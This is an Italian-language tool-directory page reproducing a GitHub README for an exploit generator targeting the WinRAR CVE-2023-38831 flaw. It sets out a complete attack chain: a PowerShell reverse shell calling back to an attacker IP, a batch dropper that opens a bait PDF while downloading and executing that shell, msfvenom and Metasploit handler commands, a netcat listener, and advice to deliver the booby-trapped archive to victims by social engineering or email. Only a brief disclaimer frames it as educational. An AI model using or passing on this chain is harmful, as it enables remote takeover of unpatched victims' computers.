Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/technicalcorp0/cve-2023-38831-exploit
Generazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingIngegneria SocialeApprendimento e FormazioneRed Teaming
GitHubtechnicalcorp0/cve-2023-38831-exploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

CVE-2023-38831-Exploit

Vedi Repository
11 anno faNon ancora revisionato

Questo progetto contiene uno script Python che sfrutta **CVE-2023-38831**, una vulnerabilità nelle versioni di **WinRAR** precedenti alla 6.23. L'exploit genera un **archivio RAR dannoso** che attiva l'esecuzione di codice arbitrario quando la vittima apre un file dall'aspetto innocuo all'interno dell'archivio (come un PDF).

Condividi

CVE-2023-38831 Generatore di Exploit WinRAR

Creato da: technical_corp

Questo progetto contiene uno script Python che sfrutta CVE-2023-38831, una vulnerabilità in WinRAR versioni precedenti alla 6.23. L'exploit genera un archivio RAR malintenzionato che innesca l'esecuzione di codice arbitrario quando la vittima apre un file dall'aspetto innocuo all'interno dell'archivio (come un PDF). La vulnerabilità è stata sfruttata attivamente in natura da aprile ad agosto 2023.

Panoramica della Vulnerabilità

CVE-2023-38831 è una vulnerabilità in WinRAR che consente agli aggressori di eseguire codice arbitrario quando la vittima apre un archivio contenente sia un file innocuo sia una cartella malintenzionata con lo stesso nome. Quando l'utente interagisce con il file innocuo, WinRAR elabora erroneamente il contenuto della cartella malintenzionata ed esegue il payload dell'aggressore.

Caratteristiche dell'Exploit

  • Genera un archivio RAR malintenzionato che contiene un file esca (ad es. un PDF) e un payload (ad es. un file .bat o .exe).
  • Il file esca può essere qualsiasi file specificato dall'utente (come un PDF o un documento).
  • Il payload può essere qualsiasi eseguibile o script (come una reverse shell creata con msfvenom).
  • Quando la vittima apre il file esca, il payload viene eseguito silenziosamente in background.

Prerequisiti

  • Python 3.x
  • WinRAR versione precedente a 6.23 installato sulla macchina della vittima (questa è la versione vulnerabile).
  • Scarica WinRAR 6.22 da qui
  • Metasploit Framework (opzionale, per generare payload).

Come Usare

Clona questo repository:

root@kitploit:~
git clone https://github.com/technical_corp/CVE-2023-38831-Exploit.git
cd CVE-2023-38831-Exploit

Utilizzeremo un file batch incorporato in un archivio .rar per scaricare ed eseguire una reverse shell PowerShell ospitata.

Passaggi:

Crea lo Script PowerShell per la Reverse Shell:

Salva il seguente script PowerShell come reverse.ps1 sulla tua macchina Kali Linux:

root@kitploit:~
$client = New-Object System.Net.Sockets.TCPClient('<attacker_ip>',<attacker_port>);
$stream = $client.GetStream();
[byte[]]$buffer = 0..65535|%{0};
while(($i = $stream.Read($buffer, 0, $buffer.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($buffer,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()};
$client.Close()

Sostituisci <attacker_ip> con l'IP della tua macchina Kali Linux.

Sostituisci <attacker_port> con il numero di porta su cui ascolterai.

Ospita lo Script PowerShell sulla tua Macchina Kali Linux:

Spostati nella cartella in cui è salvato lo script PowerShell:

root@kitploit:~
cd /path/to/powershell-script

Usa il server HTTP di Python per ospitare il file sulla porta 80:

root@kitploit:~
python3 -m http.server 80

Questo renderà reverse.ps1 disponibile all'indirizzo http://<attacker_ip>/reverse.ps1.

Crea un File Batch per Scaricare ed Eseguire lo Script PowerShell:

Crea un file batch (script.bat) che scaricherà ed eseguirà la reverse shell PowerShell:

root@kitploit:~
@echo off
:: Open the legitimate PDF
start bait.pdf

:: Download and execute the PowerShell script
powershell -Command "Invoke-WebRequest -Uri 'http://<attacker_ip>/reverse.ps1' -OutFile 'C:\Users\Public\reverse.ps1'; Start-Process powershell -ArgumentList '-ExecutionPolicy Bypass -File C:\Users\Public\reverse.ps1' -NoNewWindow"
exit

Usa lo Script Exploit CVE-2023-38831 per Incorporare il File Batch:

Esegui lo script exploit WinRAR per incorporare il file batch in un PDF legittimo:

root@kitploit:~
python3 CVE-2023-38831-WinRar-Exploit.py -b legitimate.pdf -p script.bat -o POC.rar

Questo comando crea il file POC.rar, che contiene script.bat che eseguirà la reverse shell.

Configura un Listener Netcat su Kali Linux:

Avvia un listener Netcat per catturare la reverse shell:

root@kitploit:~
nc -lvnp <attacker_port>

Consegna l'Exploit (POC.rar) alla Vittima:

Quando la vittima apre il POC.rar ed esegue il file PDF, script.bat verrà attivato. Lo script scaricherà ed eseguirà la reverse shell PowerShell dal tuo server. Riceverai una connessione reverse shell sul tuo listener Netcat.

Utilizzare un Eseguibile Senza Esecuzione Immediata:

Genera un payload (se usi Metasploit): puoi creare un payload reverse shell usando msfvenom:

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f exe > payload.exe

Sposta il file payload.exe creato nella directory CVE-2023-WinRAR-Exploit

Esegui il generatore di exploit: esegui lo script Python per generare un file RAR malintenzionato:

root@kitploit:~
python cve-2023-38831-exploiter.py -b nmapcheatsheet.pdf -p payload.exe -o POC.rar

-b: Specifica il file esca (ad es. nmapcheatsheet.pdf). -p: Specifica il file payload (ad es. script.bat o payload.exe). -o: Specifica il nome del file di output (ad es. POC.rar).

Consegna il file RAR alla vittima: il malicious_archive.rar generato può essere consegnato alla vittima tramite social engineering, allegati email o piattaforme di condivisione file.

Configura un listener (se usi Metasploit): sulla tua macchina attaccante, configura un listener per catturare la reverse shell:

root@kitploit:~
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker_IP>
set LPORT <attacker_port>
exploit

Flusso di Lavoro dell'Exploit

L'aggressore consegna un file RAR malintenzionato alla vittima. La vittima apre il file esca (ad es. nmapcheatsheet.pdf), che attiva silenziosamente il payload. Il payload (ad es. una reverse shell) viene eseguito in background, fornendo all'aggressore il controllo sul sistema della vittima.

Disclaimer

Questo progetto è destinato esclusivamente a scopi educativi. L'autore non si assume alcuna responsabilità per un uso improprio di questo exploit. Dovrebbe essere utilizzato solo in ambienti autorizzati o in scenari di penetration testing con pieno consenso.

Scarica lo strumento